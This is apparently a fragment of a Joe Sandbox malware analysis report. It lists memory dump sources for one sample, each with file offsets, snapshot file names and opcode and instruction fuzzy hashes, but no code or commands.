                                          • Source File: 00000009.00000002.4547622475.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4d60000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c02c92558dbb4efde01ada30c08c33167cd49e3c66ddc8a1d746bbcff1d55c0
                                          • Instruction ID: 8c11865f8735858e0f19e718d16e4960a8492de19030a8edc324ff6900cd337d
                                          • Opcode Fuzzy Hash: 4c02c92558dbb4efde01ada30c08c33167cd49e3c66ddc8a1d746bbcff1d55c0
                                          • Instruction Fuzzy Hash: 4BC080F45002005FD3048B34CC4456B79E3EFDC301F51C419510586168C974C940D6A0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4547622475.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4d60000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c10757f8816499232a61853589838d1896b62369f66a8813259562acbb272a5
                                          • Instruction ID: 7a114ca3d8db9e42effe79960d9cfad0670e9693fee6c3f6a542930ea0919acc
                                          • Opcode Fuzzy Hash: 4c10757f8816499232a61853589838d1896b62369f66a8813259562acbb272a5
                                          • Instruction Fuzzy Hash: D5B0123005020D4FCD406B78F50AD443B2DFA402047402231B50C06415AFAC78098798
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4547622475.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4d60000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ebdf1d183f327ad6c708c71a0b1e04e87d6ff160b7f26a6d7f964499a0fd56d
                                          • Instruction ID: 6b7afb69b5b33b6176a43e69a7898fc4c241700c653303fd83d0631d461cbc8b
                                          • Opcode Fuzzy Hash: 7ebdf1d183f327ad6c708c71a0b1e04e87d6ff160b7f26a6d7f964499a0fd56d
                                          • Instruction Fuzzy Hash: 06B0123004030D4FCD006B54F94B9153F1DF9803047801531B50D070259EBCA81487C4